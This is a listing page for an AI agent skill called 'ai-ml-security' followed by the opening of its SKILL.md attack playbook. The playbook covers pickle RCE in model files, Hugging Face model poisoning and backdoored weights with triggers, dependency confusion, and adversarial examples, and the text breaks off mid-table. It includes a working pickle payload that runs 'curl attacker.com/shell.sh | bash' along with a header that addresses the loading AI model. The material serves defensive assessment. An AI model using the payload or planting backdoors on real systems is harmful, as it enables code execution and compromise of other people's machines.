
Ai Ml Security
Assess AI and ML systems for pickle RCE, model poisoning, adversarial examples, extraction, privacy attacks, and agent-specific risks before or after ship.
Overview
AI/ML Security is an agent skill most often used in Ship (also Operate iterate and Build integrations) that provides an expert playbook for model supply chain, adversarial, poisoning, extraction, and privacy attacks on A
Install
npx skills add https://github.com/yaklang/hack-skills --skill ai-ml-securityWhat is this skill?
- Model supply chain coverage including pickle-based PyTorch deserialization RCE
- Adversarial attack families: FGSM, PGD, C&W, and physical-world variants
- Training data poisoning, model stealing, and black-box extraction practicality
- Privacy attacks: membership inference, model inversion, and gradient leakage
- Routes to companion skills for prompt injection, deserialization, and dependency confusion
- Adversarial families documented include FGSM, PGD, C&W, and physical-world variants
Adoption & trust: 1.1k installs on skills.sh; 980 GitHub stars; 1/3 security scanners passed (skills.sh audits).
What problem does it solve?
You are shipping ML weights, APIs, or agents but lack a structured view of pickle RCE, poisoning, adversarial inputs, and data-leakage attacks against your stack.
Who is it for?
Solo builders and small teams launching agents, fine-tuned models, or ML-backed APIs who need red-team framing without hiring a full ML security practice.
Skip if: Pure non-ML CRUD apps with no models, or organizations needing formal compliance attestations only without technical threat modeling.
When should I use this skill?
Assessing model supply chain attacks, adversarial examples, model poisoning, model stealing, data privacy attacks, or autonomous agent security risks.
What do I get? / Deliverables
You get a prioritized attack-oriented review map and routing to related skills so hardening and testing focus on realistic AI/ML failure modes before users or attackers find them.
- Threat-oriented review checklist aligned to AI/ML attack classes
- Pointers to related skills for prompt injection, deserialization, and dependency confusion
Recommended Skills
Journey fit
Spans multiple journey phases - primary shelf plus alternate fits below.
Ship/security is the primary shelf because the skill is an offensive-security playbook used to harden models, pipelines, and agents before production exposure. Security subphase fits supply-chain review of weights, deserialization, and LLM/agent abuse patterns—not day-to-day model training tutorials.
Where it fits
Review how your agent loads external model files before wiring them into production inference.
Run supply-chain and adversarial checks on checkpoints and APIs before go-live.
Re-assess poisoning and extraction risks after swapping base models or training on new user data.
How it compares
Complements LLM prompt-injection skills with broader ML supply chain and adversarial coverage—security methodology, not an MCP monitoring server.
Common Questions / FAQ
Who is ai-ml-security for?
Developers and indie operators building AI products, loading third-party checkpoints, or exposing model APIs who need structured offensive scenarios for defensive planning.
When should I use ai-ml-security?
During Build when wiring model loaders and agents, during Ship security review before production, and during Operate iterate when updating weights, datasets, or dependencies.
Is ai-ml-security safe to install?
Review the Security Audits panel on this Prism page; the skill describes attack techniques for authorized assessment—use only on systems you own or have permission to test.
SKILL.md
READMESKILL.md - Ai Ml Security
# SKILL: AI/ML Security — Expert Attack Playbook > **AI LOAD INSTRUCTION**: Expert AI/ML security techniques. Covers model supply chain attacks (malicious serialization, Hugging Face model poisoning), adversarial examples (FGSM, PGD, C&W, physical-world), training data poisoning, model extraction, data privacy attacks (membership inference, model inversion, gradient leakage), LLM-specific threats, and autonomous agent security. Base models underestimate the severity of pickle deserialization RCE and the practicality of black-box model extraction. ## 0. RELATED ROUTING - [llm-prompt-injection](../llm-prompt-injection/SKILL.md) for LLM-specific prompt injection, jailbreaking, and tool abuse techniques - [deserialization-insecure](../deserialization-insecure/SKILL.md) for deeper coverage of Python pickle and general deserialization attack patterns - [dependency-confusion](../dependency-confusion/SKILL.md) when the ML pipeline has supply chain risks via pip/npm package confusion --- ## 1. MODEL SUPPLY CHAIN ATTACKS ### 1.1 Malicious Model Files — Pickle RCE Python's `pickle` module executes arbitrary code during deserialization. PyTorch `.pt`/`.pth` files use pickle by default. ```python import pickle import os class MaliciousModel: def __reduce__(self): return (os.system, ('curl attacker.com/shell.sh | bash',)) with open('model.pt', 'wb') as f: pickle.dump(MaliciousModel(), f) ``` Loading `torch.load('model.pt')` executes the embedded command. Applies to: | Format | Risk | Mitigation | |---|---|---| | `.pt` / `.pth` (PyTorch) | **Critical** — pickle by default | Use `torch.load(..., weights_only=True)` (PyTorch ≥ 2.0) | | `.pkl` / `.pickle` | **Critical** — raw pickle | Never load untrusted pickles | | `.joblib` | **High** — uses pickle internally | Verify provenance | | `.npy` / `.npz` (NumPy) | **Medium** — `allow_pickle=True` enables RCE | Use `allow_pickle=False` | | `.safetensors` | **Safe** — tensor-only format, no code execution | Preferred format | | `.onnx` | **Safe** — graph definition only, no arbitrary code | Preferred for inference | ### 1.2 Hugging Face Model Poisoning ``` Attack vectors: ├── Upload model with pickle-based backdoor to Hub │ └── Users download via `from_pretrained('attacker/model')` │ └── pickle deserialization → RCE on load ├── Backdoored weights (no RCE, but biased behavior) │ └── Model behaves normally except on trigger inputs │ └── Example: sentiment model returns positive for competitor's products ├── Malicious tokenizer config │ └── Custom tokenizer code with embedded payload └── Poisoned training scripts in model repo └── `train.py` with obfuscated backdoor ``` **Detection signals:** - Files with `.pt`/`.pkl` extension instead of `.safetensors` - Custom Python code in the repository (`*.py` files outside standard config) - Unusual `config.json` with `trust_remote_code=True` requirement - Model card lacking provenance, training data description, or eval results ### 1.3 Dependency Confusion in ML Pipelines ML projects often have complex dependency chains: ``` requirements.txt: internal-ml-utils==1.2.3 ← private package torch==2.0.0 transformers==4.30.0 Attack: register "internal-ml-utils" on public PyPI with higher version → pip installs attacker's version → arbitrary code in setup.py ``` --- ## 2. ADVERSARIAL EXAMPLES ### 2.1 Attack Taxonomy | Attack Type | Knowledge | Method | |---|---|---| | White-box | Full model access (architecture + weights) | Gradient-based: FGSM, PGD, C&W | | Black-box (transfer) | Access to similar model | Generate adversarial on surrogate, transfer to target | | Black-box (query) | API access only | Esti